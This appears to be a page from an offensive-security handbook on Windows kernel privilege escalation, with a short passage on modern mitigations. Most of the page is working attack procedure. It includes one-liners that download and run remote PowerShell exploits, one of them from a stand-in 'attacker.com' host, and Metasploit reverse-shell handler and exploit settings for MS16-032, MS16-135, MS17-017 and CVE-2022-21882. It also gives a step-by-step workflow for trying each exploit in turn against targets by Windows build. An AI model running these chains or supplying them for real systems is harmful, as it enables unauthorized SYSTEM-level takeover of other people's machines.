Kernel-level privilege escalation

Understanding Kernel Exploitation

What Makes Kernel Exploits Viable

Kernel-level privilege escalation exploits vulnerabilities in the Windows kernel to gain SYSTEM privileges. These exploits target the core operating system rather than user-mode applications or misconfigurations.

Why Kernel Exploits Work:

Direct privilege elevation - Bypass user-mode security boundaries
System-level access - Complete control over the operating system
Token manipulation - Modify process tokens at kernel level
Bypass most protections - Operate below user-mode security mechanisms

Modern Reality: Kernel exploitation success has dramatically decreased due to modern mitigations like SMEP/SMAP, Kernel CFG, HVCI, and PatchGuard. Most attempts result in system crashes rather than clean escalation.

Automated Vulnerability Assessment

Windows Exploit Suggester

Setup and Execution:

# Download and setup Windows Exploit Suggester
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester

# Update exploit database
python windows-exploit-suggester.py --update

# On target system, generate systeminfo
systeminfo > systeminfo.txt

# Transfer systeminfo.txt to attacker machine and analyze
python windows-exploit-suggester.py --database 2023-01-01-mssb.xls --systeminfo systeminfo.txt --ostext "windows 10" --patches KB4013081

Output Analysis:

# Example output showing potential kernel exploits:
# [E] MS16-032: Microsoft Windows 7-10 / 2008-2012 R2 (x86/x64) - Secondary Logon Handle
# [E] MS16-135: Microsoft Windows 7-10 / 2008-2012 R2 (x86/x64) - Win32k Elevation of Privilege  
# [E] MS17-017: Microsoft Windows 7-10 / 2008-2012 R2 (x86/x64) - GDI Palette Objects Local Privilege Escalation

Sherlock PowerShell Enumeration

Automated Kernel Vulnerability Detection:

# Download and execute Sherlock
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

# Run comprehensive vulnerability check
Find-AllVulns

# Target specific kernel vulnerabilities
Find-MS16032
Find-MS16135  
Find-MS17017
Find-CVE20177199

PowerUp Integration:

# Use PowerUp for additional kernel checks
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')

# Check for kernel-related misconfigurations
Invoke-AllChecks | Where-Object {$_ -match "kernel\|driver"}

Metasploit Local Exploit Suggester

Automated Exploit Enumeration:

# Use Metasploit's local exploit suggester
use post/multi/recon/local_exploit_suggester
set SESSION 1
set SHOWDESCRIPTION true
run

# Filter for kernel exploits specifically
use post/multi/recon/local_exploit_suggester
set SESSION 1
set KEYWORD kernel
run

Tool-Based Kernel Exploitation

MS16-032 (Secondary Logon Handle)

PowerShell Implementation:

# Download and execute MS16-032 PowerShell exploit
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1')

# Execute with default command
Invoke-MS16032

# Execute with custom command
Invoke-MS16032 -Command "powershell -ep bypass"

Metasploit Module:

# Use MS16-032 Metasploit module
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
set LHOST attacker_ip
set LPORT 4445
run

Empire Framework:

# Use Empire's MS16-032 module
(Empire) > usemodule privesc/ms16032
(Empire: powershell/privesc/ms16032) > execute

MS16-135 (Win32k Elevation)

Metasploit Exploitation:

# MS16-135 Win32k exploit
use exploit/windows/local/ms16_135_win32k_elevation_of_privilege
set SESSION 1
set LHOST attacker_ip  
set LPORT 4446
run

PowerShell Version:

# Download MS16-135 PowerShell implementation
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-135.ps1')

# Execute the exploit
Invoke-MS16135

CVE-2021-1732 (Win32k Elevation)

Public Exploit Tools:

# Download CVE-2021-1732 exploit
git clone https://github.com/KaLendsi/CVE-2021-1732.git
cd CVE-2021-1732

# Transfer compiled executable to target
# Execute on target system
CVE-2021-1732.exe

PowerShell Wrapper:

# PowerShell implementation of CVE-2021-1732
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/CVE-2021-1732.ps1')
Invoke-CVE20211732

CVE-2022-21882 (Win32k Elevation)

Executable Exploit:

# Download CVE-2022-21882 from GitHub
git clone https://github.com/KaLendsi/CVE-2022-21882.git

# Transfer to target and execute
CVE-2022-21882.exe cmd.exe

Metasploit Integration:

# Check if Metasploit has module for CVE-2022-21882
search CVE-2022-21882
search 2022 win32k

# Use if available
use exploit/windows/local/cve_2022_21882_win32k
set SESSION 1
run

Framework Integration

Metasploit Kernel Exploit Workflow

Comprehensive Kernel Testing:

# Step 1: Get initial session
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit -j

# Step 2: Run exploit suggester
use post/multi/recon/local_exploit_suggester  
set SESSION 1
run

# Step 3: Try suggested kernel exploits in order
# MS16-032
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
run

# MS16-135 if MS16-032 fails
use exploit/windows/local/ms16_135_win32k_elevation_of_privilege
set SESSION 1
run

# MS17-017 if others fail
use exploit/windows/local/ms17_017_gdi_palette_escalation
set SESSION 1
run

Automated Target Assessment

System Information Gathering

Rapid Assessment Tools:

# SystemInfo analysis script
function Get-KernelVulnInfo {
    $os = Get-WmiObject -Class Win32_OperatingSystem
    $build = $os.BuildNumber
    $version = $os.Version
    
    Write-Host "OS: $($os.Caption)"
    Write-Host "Build: $build"
    Write-Host "Version: $version"
    
    # Check for known vulnerable builds
    $vulnerableBuilds = @{
        "10240" = @("MS16-032", "MS16-135")
        "10586" = @("MS16-032", "MS16-135") 
        "14393" = @("MS16-135", "MS17-017")
        "15063" = @("CVE-2017-7199")
        "17134" = @("CVE-2018-8120")
        "17763" = @("CVE-2019-0803")
        "18362" = @("CVE-2020-1054")
        "19041" = @("CVE-2021-1732")
        "19042" = @("CVE-2021-1732", "CVE-2022-21882")
    }
    
    if ($vulnerableBuilds.ContainsKey($build)) {
        Write-Host "Potentially vulnerable to: $($vulnerableBuilds[$build] -join ', ')" -ForegroundColor Red
    } else {
        Write-Host "No known kernel exploits for this build" -ForegroundColor Green
    }
}

Get-KernelVulnInfo

Patch Analysis:

# Check for critical kernel patches
$kernelPatches = @(
    "KB3139914",  # MS16-032
    "KB3124280",  # MS16-135
    "KB4013081",  # MS17-017
    "KB4499175",  # CVE-2019-0803
    "KB5000802",  # CVE-2021-1732
    "KB5010793"   # CVE-2022-21882
)

foreach ($patch in $kernelPatches) {
    $installed = Get-HotFix -Id $patch -ErrorAction SilentlyContinue
    if ($installed) {
        Write-Host "$patch is installed - $(($installed.Description))" -ForegroundColor Green
    } else {
        Write-Host "$patch is NOT installed - System may be vulnerable" -ForegroundColor Red
    }
}

Mitigation Detection

Modern Security Feature Check:

# Check for modern kernel mitigations
function Test-KernelMitigations {
    # Check for HVCI/VBS
    $hvci = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -ErrorAction SilentlyContinue
    if ($hvci -and $hvci.EnableVirtualizationBasedSecurity -eq 1) {
        Write-Host "HVCI/VBS is enabled - Kernel exploits very unlikely to work" -ForegroundColor Red
    }
    
    # Check for Hypervisor
    $hyperv = bcdedit /enum | Select-String "hypervisorlaunchtype"
    if ($hyperv -match "Auto") {
        Write-Host "Hypervisor protection active" -ForegroundColor Red
    }
    
    # Check Windows Defender status
    $defender = Get-MpComputerStatus -ErrorAction SilentlyContinue
    if ($defender -and $defender.RealTimeProtectionEnabled) {
        Write-Host "Windows Defender Real-time protection enabled" -ForegroundColor Yellow
    }
    
    # Check for CFG
    $cfg = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\kernel" -Name "MitigationOptions" -ErrorAction SilentlyContinue
    if ($cfg) {
        Write-Host "Kernel CFG may be enabled" -ForegroundColor Yellow
    }
}

Test-KernelMitigations

Tool Recommendations by Target

Windows 10 Targets

Build-Specific Tool Selection:

# Windows 10 1507 (Build 10240)
# Best tools: MS16-032, MS16-135
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
use exploit/windows/local/ms16_135_win32k_elevation_of_privilege

# Windows 10 1903+ (Build 18362+)
# Limited options: CVE-2021-1732, CVE-2022-21882
# Check specific build numbers and patch levels first

Legacy Windows Targets

Windows 7/8.1 Exploitation:

# More kernel exploits available for legacy systems
# MS16-032, MS16-135, MS17-017 all viable

# Use exploit suggester for comprehensive analysis
use post/multi/recon/local_exploit_suggester
set SESSION 1
set SHOWDESCRIPTION true
run

# Try exploits in reliability order:
# 1. MS16-032 (most reliable)
# 2. MS16-135 (good success rate)
# 3. MS17-017 (backup option)

Server Targets

Windows Server Exploitation:

# Server 2008/2012 - Many kernel exploits work
# Server 2016+ - Limited options, enhanced mitigations

# Focus on well-tested server exploits
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc  # Works on 2008-2016
use exploit/windows/local/ms16_135_win32k_elevation_of_privilege   # Server 2008-2016

Operational Considerations

When Kernel Exploits Are Worth Attempting

Target Assessment Criteria:

Legacy Windows versions (7, 8.1, Server 2008/2012)
Unpatched systems confirmed via exploit suggester
Missing critical security updates
No modern mitigations (HVCI/VBS disabled)
Air-gapped environments with limited patching

Risk Management

System Stability Risks:

High BSOD probability on modern systems
Service disruption if exploit fails
System reboot may be required

Mitigation Strategies:

Test on similar systems first if possible
Maintain alternative access methods
Document system state before exploitation
Have rollback plan if system becomes unstable

PreviousPrint Spooler-related attacks NextLinux Privilege Escalation

Last updated 8 months ago

Was this helpful?

Good afternoon

hashtagUnderstanding Kernel Exploitation

hashtagWhat Makes Kernel Exploits Viable

hashtagAutomated Vulnerability Assessment

hashtagWindows Exploit Suggester

hashtagSherlock PowerShell Enumeration

hashtagMetasploit Local Exploit Suggester

hashtagTool-Based Kernel Exploitation

hashtagMS16-032 (Secondary Logon Handle)

hashtagMS16-135 (Win32k Elevation)

hashtagCVE-2021-1732 (Win32k Elevation)

hashtagCVE-2022-21882 (Win32k Elevation)

hashtagFramework Integration

hashtagMetasploit Kernel Exploit Workflow

hashtagAutomated Target Assessment

hashtagSystem Information Gathering

hashtagMitigation Detection

hashtagTool Recommendations by Target

hashtagWindows 10 Targets

hashtagLegacy Windows Targets

hashtagServer Targets

hashtagOperational Considerations

hashtagWhen Kernel Exploits Are Worth Attempting

hashtagRisk Management

Understanding Kernel Exploitation

What Makes Kernel Exploits Viable

Automated Vulnerability Assessment

Windows Exploit Suggester

Sherlock PowerShell Enumeration

Metasploit Local Exploit Suggester

Tool-Based Kernel Exploitation

MS16-032 (Secondary Logon Handle)

MS16-135 (Win32k Elevation)

CVE-2021-1732 (Win32k Elevation)

CVE-2022-21882 (Win32k Elevation)

Framework Integration

Metasploit Kernel Exploit Workflow

Automated Target Assessment

System Information Gathering

Mitigation Detection

Tool Recommendations by Target

Windows 10 Targets

Legacy Windows Targets

Server Targets

Operational Considerations

When Kernel Exploits Are Worth Attempting

Risk Management